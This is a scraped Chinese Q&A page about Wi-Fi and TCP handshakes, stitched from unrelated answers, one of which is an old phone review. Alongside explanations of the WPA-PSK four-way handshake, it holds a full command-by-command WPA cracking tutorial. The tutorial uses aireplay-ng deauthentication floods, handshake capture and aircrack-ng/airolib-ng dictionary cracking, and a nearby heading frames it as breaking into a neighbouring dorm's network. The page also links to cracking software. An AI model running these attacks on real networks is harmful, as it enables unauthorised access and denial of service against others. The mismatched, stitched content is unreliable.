當前位置:首頁 » 無線網路 » 無線網路認證需幾次握手
擴展閱讀
電腦桌面登錄網路異常 2025-05-14 22:03:17
模擬軟體中網路連接器 2025-05-14 21:46:54

無線網路認證需幾次握手

發布時間: 2022-05-23 09:00:11

① 無線網密碼的一些問題~!

上次微軟亞洲工程院來學校做報告的時候,聽說有的Windows Mobile 5機型有無線網卡,支持802.11b協議(wifi)。當時就覺得非常有意思,於是WIFI成了這次購買PPC Phone的一個考慮指標。

總結一下,除了普通的電話功能外,多普達830主要有紅外、藍牙、GPRS、WIFI這幾種無線功能。現將我在這幾個部分的使用經驗與大家分享如下:

1、紅外

紅外介面是在老一些的手機和筆記本上普遍存在的介面,將兩台設備的介面靠近對齊即可傳輸數據。在藍牙技術成熟之後已漸漸被淘汰,新款手機很多隻有藍牙沒有紅外。紅外的傳輸速率大概只有幾K到幾十K,從筆記本上傳一首Mp3到手機上去都是一件很痛苦的事情,並且手機開了紅外功能後會很費電。恐怕目前紅外只有在手機沒有數據線的情況下能發揮一點作用了。

2、藍牙

藍牙(Bluetooth)是一種短距離無線通信技術,不過比起紅外還是要方便很多。藍牙傳輸不用將介面對齊,只要保持一定距離就行了。傳輸速率藍牙V1.1、V1.2為723.2kbps,830的V2.0傳輸速率為2Mbps。目前藍牙的應用已經非常廣泛了,常見的有藍牙交換名片/傳輸文件/藍牙耳機和藍牙GPS儀器等等。

3、GPRS

GPRS是移動的一種手機數據服務,現在聯通也開始在大城市開展和推廣它的GPRS業務。830支持的GPRS Class 10傳輸速率為144Kbp/s,可見是也相當痛苦的速率。比較實用的應用就是上上小網,看看股票、天氣預報,查查Email,看看RSS信息。要想看視頻還是下下來看吧,所謂的在線觀看依我看只是一種不切實際的提法,GPRS若能清晰在線觀看那3G就不用上了。

簡單的服務卻有復雜的資費。我在網上看到過新聞說有人用GPRS下了些視頻竟然花費了1000多元話費。可能很多人會覺得不可思議,但其實在無套餐狀態下30元/M的資費標准要解釋這筆費用是說得通的。

為了讓大家來能分辨手機上網的計費標准,結合多普達830使用時的一些選項,這里給出幾點說明:

CMNET與CMWAP

移動的GPRS分CMNET與CMWAP兩種接入點。CMNET的速度相對比較快,除了WAP網頁,還能直接上WWW網頁,資費非常貴。以我的動感地帶為例,最便宜的套餐是15元7.5MB,而包月是120元/月。我們還可以通過上面出現那種GPRS資費超出1000元的情況推斷流量費超出120元是不會自動包月的,Faint!!!CMWAP速度比較慢,能直接上WAP網頁,WAP網頁內容有很多移動的SP提供的下載圖片、鈴聲的服務,在我眼中是騙取信息費的流氓網頁,性價比極差。而上WWW網頁需要通過代理10.0.0.172:80來上,速度自然不如CMNET。不知為什麼,有些網路應用程序如官方的MSN、QQ只支持CMNET不支持CMWAP,難道是幫移動賺錢。只有通過第三方的JAVA QQ來解決。CMWAP唯一的好處是資費便宜,10元包月。

GPRS和CSD

WAP是一種無線網路應用協議,而GPRS是實現WAP應用的一種網路傳輸技術方式。WAP現在有兩種承載方式,一是CSD(電路交換數據傳送方式),二是GPRS方式(通用無線分組業務)。CSD必須基於GSM電路交換,通過撥號17266或17201接入WAP服務,傳輸速率9.6Kbps,因為要佔用電話電路,使用時無法接收來電。CSD是按時間收費,一般0.15元/分鍾。而GPRS是按流量收費(具體的上面已經介紹了),不會影響打進和呼出電話。

PAP和CHAP

GPRS設置中的PAP鑒權和CHAP鑒權是目前的在PPP中普遍使用的認證協議。PAP全稱為Password Authentication Protocol,是簡單二次握手身份驗證協議。PAP下用戶名和密碼明文傳送,安全性低;CHAP全稱為Challenge Handshake Authentication Protocol,是一種挑戰響應式協議。三次握手身份驗證,口令信息加密傳送,安全性高。

以上是830 GPRS上網可能會遇到的和需要了解的一些問題,的具體的設置和應用有空的時候再附圖說明吧。

4、WIFI

WIFI全稱Wireless Fidelity,又稱802.11b標准,就是IEEE定義的一個無線網路通信的工業標准。它的傳輸速度可以達到11Mbps,有效距離也很長,與已有的各種802.11 DSSS設備兼容。其實就是在手機中加入了無線網卡,跟筆記本接入無線網是一回事。目前有的學校、賓館、咖啡廳、水吧、機場都有無線網路覆蓋,其實如果你家裡的ADSL使用無線路由,也是可以連上接入Internet的。另外如果筆記本有無線網卡,在手機與電腦之間同步資料、傳輸文件是非常方便的。830上WIFI的典型應用有GGTV,可以收看電視直播或者各種視頻、音頻;Google Map手機版也挺不錯;訪問各種網頁,速度很快,跟電腦沒多大區別,只是屏幕小需要拖動滾動條;上網聊天及收發電子郵件也是非常順暢的。只是WIFI非常費電,電池仍舊是一個瓶頸。

② Wifi網路中,在傳輸數據前通常需要進行( )次握手,以建立無線通信網路連接

這個啊!看用什麼加密方式了,不過基本上都相同的,需要四次握手。
3.4.1 WPA-PSK 初始化工作
使用 SSID 和passphares使用以下演算法產生PSK 在WPA-PSK 中PMK=PSK
PSK=PMK=pdkdf2_SHA1(passphrase,SSID,SSID length,4096)
3.4.2 第一次握手
AP廣播SSID,AP_MAC(AA)→STATION
STATION 端
使用接受到的SSID,AP_MAC(AA)和passphares使用同樣演算法產生PSK
3.4.3 第二次握手
STATION 發送一個隨機數SNonce,STATION_MAC(SA)→AP
AP端
接受到SNonce,STATION_MAC(SA)後產生一個隨機數ANonce
然後用PMK,AP_MAC(AA),STATION_MAC(SA),SNonce,ANonce 用以下算
法產生PTK
PTK=SHA1_PRF(PMK, Len(PMK), "Pairwise key expansion",MIN(AA,SA) ||
Max(AA,SA) || Min(ANonce,SNonce) || Max(ANonce,SNonce))
提取這個PTK 前16 個位元組組成一個MIC KEY
3.4.4 第三次握手
AP發送上面產生的ANonce→STATION
STATION 端
用接收到ANonce 和以前產生PMK,SNonce,AP_MAC(AA),STATION_MAC(SA)
用同樣的演算法產生PTK。
提取這個PTK 前16 個位元組組成一個MIC KEY
使用以下演算法產生MIC值
用這個MIC KEY 和一個802.1x data 數據幀使用以下演算法得到MIC值
MIC = HMAC_MD5(MIC Key,16,802.1x data)
3.4.5 第四次握手
STATION 發送802.1x data ,MIC→AP
STATION 端
用上面那個准備好的802.1x 數據幀在最後填充上MIC值和兩個位元組的0(十六進
制)讓後發送這個數據幀到AP。
AP端
收到這個數據幀後提取這個MIC。並把這個數據幀的MIC部分都填上0(十六進
制)這時用這個802.1x data 數據幀,和用上面AP產生的MIC KEY 使用同樣的
演算法得出MIC』。如果MIC』等於STATION 發送過來的MIC。那麼第四次握手成
功。若不等說明則AP 和STATION 的密鑰不相同,或STATION 發過來的數據幀
受到過中間人攻擊,原數據被篡改過。握手失敗了。

如何破解隔壁宿舍的無線網路

WPA加密方式正在保護無線網路!WPA(或許也叫WPA2)是目前最常見的無線區域網加密協議,一般家庭使用的是WPA-PSK模式,其中PSK是指預共享密鑰的意思,我們這里不討論WPA-PSK的工作原理,我來談談關於入侵這類型加密的原理。
通俗一點說,就是破解Wi-Fi密碼,不知覺的進入別人的內網進行活動。那麼怎樣破解密碼呢?
破解WPA-PSK密碼分為兩個部分:抓包和離線暴力攻擊。抓包是指獲取握手包,WPA加密方式包含四次握手,四次握手允許客戶端(也就是手機、筆記本等通過無線網路連接的設備。)和AP(接入點,可以理解為網路入口或者路由器。)對無線傳送的流量進行加密,所以握手包裡面會包含密文。四次握手發生在客戶端與AP的認證過程中,例如你打開手機的Wi-Fi功能後,手機顯示「驗證身份」、「正在獲取IP地址」,其實在這幾秒鍾內,手機與AP正在發生四次握手。
這幾秒鍾非常重要,黑客通過計算機網卡截獲這些數據包,並保存下來,這就完成了抓包的過程。
但是這里有一個問題,這種抓包方式太被動了,因為要恰好碰上客戶端接上網路的瞬間,時間只有僅僅的幾秒,這會讓黑客失去耐心。
不過有時候失去耐心反而是最好的,因為黑客會想方設法的讓客戶端重新進行四次握手的過程。如何讓客戶端重新連接網路呢?就是踢他下線!
通過802.11拒絕服務攻擊,可以讓一個客戶端斷線。原理就是黑客的計算機網卡發送一組「解除認證數據包」給客戶端,這時客戶端就會斷開與AP的連線,並且重新進行四次握手,這樣黑客就能完成抓包的過程。
但是,想要抓取四次握手的數據包並非易事,需要多次的嘗試,這意味著黑客需要不斷的發送「解除認證數據包」,有的時候一個「解除認證數據包」就完事了,也有的時候,幾十萬個「解除認證數據包」也不能讓黑客得到握手包。所以,拒絕服務攻擊常常被形象的稱為洪水般的攻擊。
你應該注意到了,四次握手的對象是AP與客戶端,也就意味著如果沒有客戶端,那麼黑客將束手無策,至少他不得不費更多的時間。也就是說,如果家庭開著路由器,但是沒有手機、筆記本等連接這個網路,那麼對於黑客來說,這不是攻擊WPA的好時機!黑客會懊惱的發現,在顯示屏的DATA(數據包)那一欄的數值永遠是0。

成抓包,剩下的任務就是離線暴力攻擊,這個過程不需要與網路進行交互,也就是說黑客只需要保存這個握手包,他就可以在地球任一個角落進行暴力攻擊。這也解
釋了離線的意思。暴力攻擊也稱為字典攻擊,原理是通過事先保存的密碼表一一驗算這個握手包包含的密文,這個密碼表形象稱為字典,為什麼?因為這個密碼表非
常大,包含了常見的密碼組合。
但是WPA-PSK的密文十分具有挑戰性,如果密碼組合十分復雜,你會發現即使花了大量的時間,但還在原地踏步。不巧的是,如果密碼表不包含真正的密碼,那麼就意味著暴力攻擊失效了。
目前緩解這種壓力的方法有兩個,第一就是增加密碼表的容量,使它能夠組合出真正的密碼,第二就是加快驗證速度,縮短等待時間。目前個人電腦的中央處理器每秒鍾能夠破解200個密碼左右,而利用高性能的顯卡能夠達到每秒鍾10000個密碼左右的速度。不過令人懊惱的是,一份普通的密碼表就包含2的18次方個密碼,跑完整套密碼表需要很多時間。

總結一下,破解WPA密碼包含兩個過程,首先是獲得握手包,然後再暴力攻擊這個握手包從而獲得密碼。事實上,這兩個過程非常耗時間,只要密碼足夠復雜,那麼要破解WPA可以認為是不可能。

談談個人溫馨提示:
也許你想嘗試破解WPA密碼,在網上搜索你就會發現很多密碼破解的教程。但是千萬不要被那些花俏的語言迷惑了你,那些多種多樣的教程本質上就是上文提到的兩個過程。我查閱了相關資料,截至2012年(書的出版日期),已知的攻擊WPA的方法只有這一個,所以你還是別太相信網路上面的教程。
另外,不要下載網上的關於破解WPA的軟體,因為那都是騙人的。目前Windows操作系統不支持網卡監控模式(也叫戰爭模式。),而網卡只有處於監控模式才能截取到握手包,也就意味著在Windows平台一般是不能完成抓包工作的。所以網上的關於破解Wi-Fi密碼這一類軟體十有八九都是假的。
這里簡略的說說破解過程。一般完成抓包工作需要Linux操作系統,經典的是使用BT3操作系統或者BEMEI奶瓶操作系統。這就需要你有一定的在計算機安裝操作系統的知識,以及關於Linux命令行的知識,這里我就不詳談,你可以網路一下關於BT3、奶瓶操作系統的教程。而離線暴力攻擊可以在任何平台完成,即使在Windows操作系統下也可以完成的,這些你也可以網路一下。

不得不告訴你,WPA密碼十分具有挑戰性,破解這類密碼沒有百分百的把握,前提是密碼表包含了真正的密碼。所以家庭裡面不用擔心有人蹭網了,只要密碼足夠復雜,那麼黑客是很難通過這種方法破解WPA密碼,所以說啊,WPA是目前最好的網路加密方法。

盡管WPA足夠安全,但是黑客早已失去了對WPA的興趣,現在最新的攻擊是繞過WPA機制,轉而對客戶端的攻擊,通過軟體漏洞、ARP欺詐、DNS拒絕服務等等進而有機可乘。不過你不用擔心,因為要完成這些工作需要很長的時間,如果沒有十分重要的目的,很少人會有耐心做這些事情。電影裡面的黑客也許很厲害,但是每一次的攻擊其實是很費時間的,那些點點鍵盤,說幾句專業術語就破解了密碼的場景,其實都是騙你的......沒有你想像中那麼簡單。

小神

④ 如果破解WPA格式的無線網路密碼~~

WPA破解詳細教程
破解 WPA 的前提:必須要有合法無線客戶端
WPA 破解的原理:
利用Deauth驗證攻擊。也就是說強制讓合法無線客戶端與AP被斷開,當它被從WLAN 中斷開後,這個無線
客戶端會自動嘗試重新連接到AP上,在這個重新連接過程中,數據通信就產生了,然後利用airomp捕獲
一個無線路由器與無線客戶端四次握手的過程,生成一個包含四次握手的cap包。然後再利用字典進行暴力
破解。
1. 激活網卡,並讓其工作於11信道
Airmon-ng start wifi0 11
2.捕獲11信道的cap包,並保存cap包為123.cap
Airomp-ng –w 123 –c 11 wifi0
上圖可以看出採用了WPA加密方式,並且有一個0016b69d10ad合法的無線客戶端。
3. 進行Deauth驗證攻擊,強制斷開合法無線客戶端和AP直接的連接,使其重新進行連接
aireplay-ng -0 10 -a <ap mac> -c <my mac> wifi0
解釋:-0指的是採取Deautenticate攻擊方式,後面為發送次數。-c建議還是使用,效果會更好,這個後面跟
的是監測到的合法的已連接的客戶端MAC地址
注意上圖紅色部分,-c後面為合法無線客戶端的MAC地址
Deauth攻擊往往並不是一次攻擊就成功,為確保成功截獲需要反復進行(WPA破解不用等到數據Data達到
幾萬,因為它只要一個包含WPA4次握手驗證包就可以了)。如果成功捕獲會出現下圖紅色部分的提示
中國無線論壇中衛出品
AnywhereWLAN!! 25
這時如果輸入dir就可以在root目錄下看到名為123.cap的握手包了。
得到握手包以後就可以用字典直接破解
首先將在windows下用字典工具生成的字典(例password.txt)拷貝到root目錄下
在BT3桌面雙擊system然後出現下圖。
圖中左邊紅色就為root目錄,圖中紅色存儲介質雙擊打開以後就看到你的每個硬碟的分區了。可以進入硬
盤分區右鍵拷貝,然後進入root目錄右鍵粘貼。如下圖紅色部分
目前WPA 的破解主要還是基於暴力破解和字典破解,暴力破解和字典破解的一個共性就是「耗時、費力、
運氣」所以往往有時候你花了很多時間但還是破不了,這時候希望大家還是要接受這樣一個殘酷的現實。
中國無線論壇中衛出品
AnywhereWLAN!! 26
破解方式一:用Cap數據包直接暴力破解
從破解難度上講WEP 是很容易破解的,只要你收集足夠的Cap 數據包就肯定可以破解。WPA 的破解需要
有好的密碼字典配合才能完成,復雜的WPA密碼可能幾個月也破解不出來。
輸入:aircrack-ng -z –b <ap mac> 123*.cap
123 是前面所獲得的握手包的文件名。系統會自動在你輸入的文件名後加上-01、-02(如果數據包太多,系
統會自動分成幾個文件存儲並自動命名,可以使用ls查看),輸入123*是打開所有123相關的cap文件。
常見問題:步驟2中收集數據包已達30W,無法破解密碼。可能系統自動分成了幾個文件貯存cap包。
如輸入123-01.cap破解可能導致破解不成功,建議使用123*.cap選擇所有的cap包進行破解。
中國無線論壇中衛出品
AnywhereWLAN!! 27
破解方式二. 掛字典破解
一.直接在BT3中掛字典破解
aircrack-ng –w password.txt –b <ap mac> 123.cap
參數說明:passwrod.txt為字典名稱123.cap為步驟2中獲得的握手信息包
耗時1分31秒獲得WPA密碼,如下圖
從上圖可以看出破解用時1分31秒,速度149.91K/S
註:本教程只為了描述破解的過程。我是做了個256K的小字典,事先把密碼已經加到字典里了。
二.也可以把包含4次握手的CAP數據包拷貝到硬碟下在WIN下用WinAircrack掛字典破解。
中國無線論壇中衛出品
AnywhereWLAN!! 28
如上圖 Encryption type處選擇WPA-PSK,下面capture files處導入抓取的握手包123.cap
然後選擇WPA選項,如下圖
在上圖中Dictionary file處導入字典文件password.txt。然後點擊右下角的Aircrack the key
中國無線論壇中衛出品
AnywhereWLAN!! 29
然後出現下圖提示
上圖,選擇1後回車,然後開始破解。成功破解如下圖
從上圖可以看出破解用時54秒,速度251.73K/S(比BT3下要快)
中國無線論壇中衛出品
AnywhereWLAN!! 30
三.通過airolib構建WPA table實現WPA線速破解
WPA的字典破解除了直接掛字典破解外,另外一種就是用airolib將字典構造成WPA table然後再用aircrac
進行破解。
構建WPA table就是採用和WPA加密採用同樣演算法計算後生成的Hash 散列數值,這樣在需要破解的時候直
接調用這樣的文件進行比對,破解效率就可以大幅提高。
先講通過airolib構建WPA table
WPA table具有較強的針對ssid的特性。
1. 在構建WPA table之前需要准備兩個文件:一個是ssid列表的文件ssid.txt,一個是字典文件
password.txt。下圖為我的文件
大家可以看到兩個txt的文件,ssid記事本里是ssid的列表,你可以增加常見的ssid進去,後面的passwrod
就是字典文件了。
2. 把這ssid.txt和password.txt還有上面抓到的握手包123.cap這三個文件拷貝到root目錄下方便使用。
見下圖
3.開始利用airolib-ng來構建WPA table了。構建wpa table保存的名字為wpahash(下同)
第一步,如下圖
airolib-ng wpa --import essid ssid.txt
中國無線論壇中衛出品
AnywhereWLAN!! 31
第二步,如下圖
airolib-ng wpa --import passwd password.txt
第三步,如下圖
airolib-ng wpa --clean all
第四步,如下圖
airolib-ng wpa --batch
註:這一步要等很久(視字典大小而定,我256K的字典等了有15分鍾)
4. 用aircrack來利用WPA table進行破解
Aircrack-ng –r wpahash 123.cap
選擇1以後將開始破解。
中國無線論壇中衛出品
AnywhereWLAN!! 32
成功破解將如下圖所示
從上圖中可以看出耗時00:00:00反正不超過1秒鍾,速度42250.00K/S
大家也看到了三種破解方式,直接掛字典中在win下用WinAircrack破解是速度比在BT3下要快。直接掛字典
破解不超過1分鍾就破出了密碼;利用WPA table破解速度雖然不到一秒,但是構建WPA table卻耗費了15分
鍾。構建WPA table是很耗時的,但是構建出了包括常見ssid的和相對較大字典的WPA table的話,以後破
解的速度將大大降低。當然沒有萬能的字典,如果有萬能的字典,再構建出一個常見ssid的WPA table的話
那這個預運算資料庫是超級超級龐大的。
註:WIN平台下的CAIN軟體中的破解器也可用於WEP和WPA的基於暴力和字典的破解,但是其破解速度很慢,
相比aircrack-ng而言不具實用價值。
中國無線論壇中衛出品
AnywhereWLAN!! 33
Aireplay-ng的6種攻擊模式詳解
-0 Deautenticate 沖突模式
使已經連接的合法客戶端強制斷開與路由端的連接,使其重新連接。在重新連接過程中獲得驗證數據包,
從而產生有效ARP request。
如果一個客戶端連在路由端上,但是沒有人上網以產生有效數據,此時,即使用-3 也無法產生有效ARP
request。所以此時需要用-0 攻擊模式配合,-3 攻擊才會被立刻激活。
aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0
參數說明:
【-0】:沖突攻擊模式,後面跟發送次數(設置為0,則為循環攻擊,不停的斷開連接,客戶端無法正常上
網)
【-a】:設置ap的mac
【-c】:設置已連接的合法客戶端的mac。如果不設置-c,則斷開所有和ap連接的合法客戶端。
aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
註:使用此攻擊模式的前提是必須有通過認證的合法的客戶端連接到路由器
-1 fakeauth count 偽裝客戶端連接
這種模式是偽裝一個客戶端和AP進行連接。
這步是無客戶端的破解的第一步,因為是無合法連接的客戶端,因此需要一個偽裝客戶端來和路由器相連。
為讓AP接受數據包,必須使自己的網卡和AP關聯。如果沒有關聯的話,目標AP將忽略所有從你網卡發
送的數據包,IVS 數據將不會產生。用-1 偽裝客戶端成功連接以後才能發送注入命令,讓路由器接受到注
入命令後才可反饋數據從而產生ARP包。
aireplay-ng -1 0 –e <ap essid> -a <ap mac> -h <my mac> wifi0
參數說明:
【-1】:偽裝客戶端連接模式,後面跟延時
【-e】:設置ap的essid
【-a】:設置ap的mac
【-h】:設置偽裝客戶端的網卡MAC(即自己網卡mac)
-2 Interactive 交互模式
這種攻擊模式是一個抓包和提數據發攻擊包,三種集合一起的模式
1.這種模式主要用於破解無客戶端,先用-1建立虛假客戶端連接然後直接發包攻擊
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
參數說明:
【-2】:交互攻擊模式
【-p】設置控制幀中包含的信息(16進制),默認採用0841
【-c】設置目標mac地址
【-b】設置ap的mac地址
【-h】設置偽裝客戶端的網卡MAC(即自己網卡mac)
2.提取包,發送注入數據包
aireplay-ng -2 –r <file> -x 1024 wifi0
發包攻擊.其中,-x 1024 是限定發包速度,避免網卡死機,可以選擇1024。
中國無線論壇中衛出品
AnywhereWLAN!! 34
-3 ARP-request 注入攻擊模式
這種模式是一種抓包後分析重發的過程
這種攻擊模式很有效。既可以利用合法客戶端,也可以配合-1 利用虛擬連接的偽裝客戶端。如果有合法客
戶端那一般需要等幾分鍾,讓合法客戶端和ap 之間通信,少量數據就可產生有效ARP request 才可利用-3
模式注入成功。如果沒有任何通信存在,不能得到ARP request.,則這種攻擊就會失敗。如果合法客戶端和
ap之間長時間內沒有ARP request,可以嘗試同時使用-0 攻擊。
如果沒有合法客戶端,則可以利用-1 建立虛擬連接的偽裝客戶端,連接過程中獲得驗證數據包,從而產生
有效ARP request。再通過-3 模式注入。
aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
參數說明:
【-3】:arp注入攻擊模式
【-b】:設置ap的mac
【-h】:設置
【-x】:定義每秒發送數據戶包的數量,但是最高不超過1024,建議使用512(也可不定義)
-4 Chopchop 攻擊模式,用以獲得一個包含密鑰數據的xor 文件
這種模式主要是獲得一個可利用包含密鑰數據的xor 文件,不能用來解密數據包。而是用它來產生一個新
的數據包以便我們可以進行注入。
aireplay-ng -4 -b <ap mac> -h <my mac> wifi0
參數說明:
-b:設置需要破解的AP的mac
-h:設置虛擬偽裝連接的mac(即自己網卡的mac)
-5 fragment 碎片包攻擊模式用以獲得PRGA(包含密鑰的後綴為xor 的文件)
這種模式主要是獲得一個可利用PRGA,這里的PRGA 並不是wep key數據,不能用來解密數據包。而是
用它來產生一個新的數據包以便我們可以進行注入。其工作原理就是使目標AP重新廣播包,當AP重廣播
時,一個新的IVS將產生,我們就是利用這個來破解
aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
【-5】:碎片包攻擊模式
【-b】:設置ap的mac
【-h】:設置虛擬偽裝連接的mac(即自己網卡的mac)
中國無線論壇中衛出品
AnywhereWLAN!! 35
Packetforge-ng:數據包製造程序
Packetforge-ng <mode> <options>
Mode
【-0】:偽造ARP包
packetforge-ng -0 -a <ap mac> -h <my mac> wifi0 –k 255.255.255.255 -l 255.255.255.255
–y<.xor file> -w mrarp
參數說明:
【-0】:偽裝arp數據包
【-a】:設置ap的mac
【-h】設置虛擬偽裝連接的mac(即自己的mac)
【-k】<ip[:port]>說明:設置目標文件IP和埠
【-l】<ip[:port]>說明:設置源文件IP和埠
【-y】<file>說明:從xor 文件中讀取PRGA。後面跟xor 的文件名。
【-w】設置偽裝的arp包的文件名
Aircrack-ng:WEP 及WPA-PSK key 破解主程序
Aircrack-ng [optin] <.cap/.ivs file>
Optin
aircrack-ng -n 64 -b <ap mac> name-01.ivs
參數說明:
【-n】:設置WEP KEY 長度(64/128/152/256/512)
aircrack-ng -x -f 2 name-01h.cap
參數說明:
【-x】:設置為暴力破解模式
【-f】:設置復雜程度,wep密碼設置為1,wpa 密碼設置為2
aircrack-ng -w password.txt ciw.cap
【-w】:設置為字典破解模式,後面跟字典文件,再後面跟是我們即時保存的那個捕獲到WPA 驗證的抓包
文件。
中國無線論壇中衛出品
AnywhereWLAN!! 36
常見問題薈萃
問題1:我在啟動bt3 的時候,輸入startx黑屏
解答:在輸入用戶名root 和密碼toor 以後輸入xconf 這時會黑屏一會,然後出來提示符再輸入startx 可進入
win窗口;當實在不能進入win窗口的時候你也可以直接在提示符下輸入各破解命令,同時可用alt+f1 打開
一個shell,alt+f2 打開第二個shell,alt+f3 打開第三個等。關閉窗口用PRINT SCREEN 鍵
問題2:在BT3中打開kismet 的時候窗口一閃就沒了。
解答:首先載入驅ifconfig -a rausb0 開始網卡監聽:airmon-ng start rausb0。找到/usr/local/etc/kismet.conf
打開此文件在channelsplit=true下面加入一行source=rt2500,rausb0,monitor
註: wusb54g v4一定是rt2500 ,不是載入驅動時顯示的rt2570。
3945 的兄弟加入source=ipw3945,eth0,IPW3945

⑤ 為什麼無線AP,設置wpa-psk eap 802.1x然後抓包裡面都是open system

ap和電腦之間的wpa psk的認證流程是這樣的:

  1. AP定期發送beacon數據包beacon包裡麵包含無線網路的名稱 這樣電腦就能搜索到AP了,並且beacon裡面也包含了是否支持wpa

  2. 電腦向AP發送AUTH包。AUTH認證類型有兩種,0為開放式、1為共享式(WPA/WPA2必須是開放式),所以如果是wpa模式 那認證類型就是0

  3. AP回應AUTH包

  4. 電腦AP發送associationrequest包

  5. AP回應associationrequest包

  6. 重點來了 下面進行最重要的密碼認證過程 即4次握手

    6.1 AP端產生PSK。psk的生成 是以 wifi密碼+無線網路名稱等參數通過sha1演算法生成的。AP同時會發送一個eapol包給電腦 裡麵包含了無線網路名稱和無線網路mac地址等參數 ,這是第一次發eapol包

6.2電腦端根據收到的無線網路名稱加上wifi密碼等參數通過sha1演算法產生同樣的psk. 電腦同時產生一個隨機數 加上自己的mac地址,放到eapol包裡面發給AP

6.3 AP收到包後,也產生一個隨機數 ,ap把自己產生的隨機數和收到的隨機數 加上自己的mac地址 電腦的mac地址 和PSK,生成一個PTK。AP把自己產生的隨機數放到eapol里發給電腦。

6.4 電腦收到包後,提取出來隨機數 加上剛才6.2自己產生的隨機數 以及 mac地址和psk 信息,生成同樣的PTK。這樣雙方一模一樣的PTK都有了,這時候電腦就會用PTK加密一個數據 放在eapol包里 發給AP

6.5 ap收到這個eapol包後 如果解密成功 那麼就可以正常上網了,如果解密失敗 說明你電腦上輸入的密碼不對 需要重新輸入密碼 然後重復進行上面的過程 直到你輸入正確的路由器密碼。

⑥ TCP/IP需要幾次握手

1. TCP IP建立連接需要三次握手,斷開連接需要四次揮手
在TCP層,有個FLAGS欄位,這個欄位有以下幾個標識:SYN, FIN, ACK, PSH, RST, URG。
其中,對於我們日常的分析有用的就是前面的五個欄位。
它們的含義是:
SYN表示建立連接,
FIN表示關閉連接,
ACK表示響應,
PSH表示有 DATA數據傳輸,
RST表示連接重置。

⑦ 公共場所連接wifi熱點,會不會泄露隱私

在公共場所通常我是不推薦使用公共WIFI的,因為現在很多路由都可以裝商業插件,或是商業WIFI產品,他們都可以手機用戶的個人信息。在這種情況下是非常容易泄露隱私的。如果某人在路由上做了手腳,他是可以監控你所有操作的,甚至攔截你的各種數據信息,這對隱私而言已經沒有什麼安全可言了。甚至可以直接往你手機上移植木馬。可能你會說哪有這么多高手,但我要告訴你的是,100次你遇到1次,你就有可能損失慘重,切忌公共WIFI 不要操作重要軟體。

⑧ 無線網設置WPA2密碼怎麼破解呢

下載地址破解http://www.pc6.com/softview/SoftView_128.html

在動手破解WPA/WPA2前,應該先了解一下基礎知識,本文適合新手閱讀
首先大家要明白一種數學運算,它叫做哈希演算法(hash),這是一種不可逆運算,你不能通過運算結果來求解出原來的未知數是多少,有時我們還需要不同的未知數通過該演算法計算後得到的結果不能相同,即你不太可能找到兩個不同的值通過哈希得到同一個結果。哈希是一類演算法的統稱,通常哈希演算法都是公開的,比如MD5,SHA-1等等。;

我們平時說的WPA密碼其實叫PSK(pre-shared key),長度一般是8-63位元組,它加上ssid通過一定的演算法可以得到PMK(pairwise master key)。PMK=SHA-1(ssid,psk) ,PMK的長度是定長的,都是64位元組。由於計算PMK的過程開銷比較大,是我們破解花費時間長的關鍵,所以採用以空間換時間的原則把PMK事先生成好,這個事先生成好的表就是常說的HASH表(生成PMK的演算法是一種哈希),這個工作就是用airlib-ng這個工具來完成的,我們的快速破解就是這么來的。

認證的時候會生成一個PTK(pairwise temporary),這是一組密鑰,具體細節不詳細說了,它的生成方法也是採用的哈希,參數是連接的客戶端MAC地址、AP的BSSID、A-NONCE、S-NONCE、PMK,其中A-NONCE和S-NONCE是兩個隨機數,確保每次連接都會生成不同的PTK。PTK的計算消耗很小。PTK加上報文數據採用一定的演算法(AES或TKIP),得到密文,同時會得到一個簽名,叫做MIC(message integrality check),tkip之所以被破解和這個mic有很大關系。
四次握手包中含有以上的哪些東西呢?客戶端的MAC地址,AP的BSSID,A-NONCE,S-NONE,MIC,最關鍵的PMK和PTK是不包含在握手包里的!
8 A2 m6 T& }) U2 J認證的原理是在獲得以上的所有參數後,客戶端算出一個MIC,把原文連同MIC一起發給AP,AP採用相同的參數與演算法計算出MIC,並與客戶端發過來的比較,如果一致,則認證通過,否則失敗。

目前的破解方法是我們獲得握手包後,用我們字典中的PSK+ssid先生成PMK(如果有HASH表則略過),然後結合握手包中的(客戶端MAC,AP的BSSID,A-NONCE,S-NONCE)計算PTK,再加上原始的報文數據算出MIC並與AP發送的MIC比較,如果一致,那麼該PSK就是密鑰。
目前最耗時的就是算PMK,可謂破解的瓶頸。即使搞定了運算量的問題,海量的密鑰存儲也是個問題(PMK都是64位元組長度)!
最近出來的tkiptun-ng只是可以解開使用tkip加密了的數據包,並不是說能夠快速算出PMK或PSK。如果感興趣,可以到書店看看講哈希的書,說不定你把這些HASH演算法都破解出來了。

wpa_supplicant套件中有個小工具,叫做wpa_passphrase,它和airolib-ng的作用差不多,都是用來生成PMK,在backtrack中應該自帶這個工具。比如有個ssid為TP-LINK,PSK是12345678,那麼生成PMK的方法就是wpa_passphrase TP-LINK 12345678,結果應該是這樣:
network={ ssid="TP-LINK"
#psk="12345678"
psk=
psk=其實就是PMK了,一般在電腦上運行查看無線密碼的軟體就是得到這個,把直接輸入到無線客戶端中就可以連上該ssid,相當於輸入了12345678,生成PMK的過程是不可逆的,即無法通過來逆推得到12345678。可以看到同樣是psk是12345678,如果ssid名字改變,那麼pmk就會發生改變,這就是為什麼用airolib-ng建表是只能按ssid生成。

⑨ tcp終止連接需要幾次握手

TCP連接和終止:建立一個連接需要三次握手,而終止一個連接要經過四次握手,這是由TCP的半關閉(halfclose)造成的。